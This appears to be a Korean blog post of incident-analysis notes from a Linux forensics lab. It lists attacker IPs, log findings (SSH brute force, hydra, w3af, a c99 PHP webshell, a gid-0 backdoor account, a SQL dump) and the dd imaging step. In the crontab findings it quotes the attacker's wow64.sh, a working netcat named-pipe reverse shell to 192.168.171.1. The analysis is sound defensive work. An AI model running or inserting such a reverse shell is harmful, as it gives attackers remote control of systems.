---
layout : post
title : 침해사고분석 - Linux
---

### Linux Image Dump

> ex) dd if=/dev/sda of=/mnt/hgfs/LinuxImage/linux.dd

<br>

### 실습

>**Victim IP**
>
>192.168.171.188
>
>**Attacker IP**
>
>192.168.171.1, 192.168.171.146, 192.168.171.182
>
><br>
>
>**crontab**
>
>/tmp/wow64.sh 쉘 스크립트 실행 등록
>
><br>
>
>**wow64.sh**
>
>#!/bin/bash
>
>mknod /tmp/backpipe p
>
>/bin/sh 0</tmp/backpipe | nc 192.168.171.1 5555 1>/tmp/backpipe
>
><br>
>
>**/etc/passwd**
>
>infosechack 계정 root도 아닌데 gid가 0
>
><br>
>
>**/var/log/auth.log**
>
>Nov 1 21:32:20 192.168.171.146
>
>ssh brute force attack
>
>Nov 1 21:41:02 192.168.171.1
>
>1. Windows SSH Client로 SSH 접속
>2. root로 로그인 성공
>3. infosechack useradd 됨
>4. 로그아웃 후 infosechack으로 다시 ssh 접속
>
><br>
>
>**/var/log/access.log**
>
>Nov 1 21:19:16
>
>192.168.171.182
>
>vega 사용(brute force 툴)
>
>192.168.171.146
>
>w3af 사용(웹앱 공격 툴)
>
>/morningmall/m_login_ok.php
>
>hydra 사용(brute force 툴) 
>
><br>
>
>**/var/log/apache2/access.log**
>
>Nov 1 23:29:02 192.168.171.1
>
>c99_madnet.php 접근(php webshell)
>
>코드 난독화
>
>base64 php decoding
>
><br>
>
>**/var/www/morningmall/dump_192.168.171.188_mysql_02-11-2014-00-07-10.sql**
>
>2014-11-02 00:07:10
>
>sql 덤프